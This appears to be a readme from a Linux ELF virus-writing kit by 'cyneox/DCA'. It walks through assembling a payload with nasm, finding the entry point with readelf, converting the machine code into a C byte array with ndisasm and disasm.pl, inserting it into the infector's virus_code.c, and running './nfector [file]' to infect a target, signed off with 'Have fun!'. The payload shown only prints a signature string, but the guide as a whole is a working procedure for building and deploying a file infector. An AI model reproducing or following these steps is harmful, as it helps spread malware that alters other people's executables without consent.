cyneox.asm contains the virus code. First you'll have to compile this source : [code] cyneox@dca:~>nasm -f elf -o cyneox.o cyneox.asm [/code] Then you'll have to link it : [code] cyneox@dca:~>ld -o cyneox cyneox.o [/code] Now we want to disassemble our executable...Therefore I'll use ndisasm.Then I must transform those opcodes in C code.Therefore I'll use disasm.pl in this directory(thanx Bartolich , who wrote ELFVirusWrittingHowto, for this wonderfull tool). First of all you find out the entry point of the binary: [code] cyneox@dca:~>readelf cyneox -h ELF Header: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: Intel 80386 Version: 0x1 Entry point address: 0x8048080 Start of program headers: 52 (bytes into file) Start of section headers: 280 (bytes into file) Flags: 0x0 Size of this header: 52 (bytes) Size of program headers: 32 (bytes) Number of program headers: 1 Size of section headers: 40 (bytes) Number of section headers: 8 Section header string table index: 5 [/code] You see that 0x8048080 is our entry point.Now you must subtract from the entry point the ELF base to find out the offset to the beginning of our code. 0x8048080 - 0x8048000 = 0x80 (offset) And now lets see the whole thing : [code] cyneox@dca:~>ndisasm -e 0x80 -o 0x8048080 -U cyneox | sed 18q | disasm.pl const unsigned char main[] __attribute__ (( aligned(8), section(".text") )) = { 0x68,0x00,0x00,0x00,0x00, /* 08048080: push dword 0x0 */ 0x9C, /* 08048085: pushf */ 0x60, /* 08048086: pusha */ 0x68,0x3A,0x0A,0x20,0x20, /* 08048087: push dword 0x20200a3a */ 0x68,0x6B,0x20,0x3A,0x3A, /* 0804808C: push dword 0x3a3a206b */ 0x68,0x6F,0x78,0x2E,0x74, /* 08048091: push dword 0x742e786f */ 0x68,0x63,0x79,0x6E,0x65, /* 08048096: push dword 0x656e7963 */ 0x68,0x77,0x77,0x77,0x2E, /* 0804809B: push dword 0x2e777777 */ 0x68,0x3A,0x3A,0x3A,0x20, /* 080480A0: push dword 0x203a3a3a */ 0xB8,0x04,0x00,0x00,0x00, /* 080480A5: mov eax,0x4 */ 0xBB,0x01,0x00,0x00,0x00, /* 080480AA: mov ebx,0x1 */ 0x89,0xE1, /* 080480AF: mov ecx,esp */ 0xBA,0x18,0x00,0x00,0x00, /* 080480B1: mov edx,0x18 */ 0x81,0xC4,0x18,0x00,0x00,0x00, /* 080480B6: add esp,0x18 */ 0xCD,0x80, /* 080480BC: int 0x80 */ 0x61, /* 080480BE: popa */ 0x9D, /* 080480BF: popf */ 0xC3 /* 080480C0: ret */ }; /* 65 bytes (0x41) */ [code] Then you must save this code into a file: [code] cyneox@dca:~>ndisasm -e 0x80 -o 0x8048080 -U cyneox | sed 18q | disasm.pl > virus_code.c [/code] Then you'll have to change "const unsigned char main[]" to "const unsigned char virus_code[]".Then copy this to the original virus_code.c file : [code] cyneox@dca:~>cp virus_code.c ../virus_code.c [/code] Next step is too update virus size in ../write_infection.h Then execute ./make.sh and then ./nfector [file] Have fun! ; ) cyneox/DCA http://www.cyneox.tk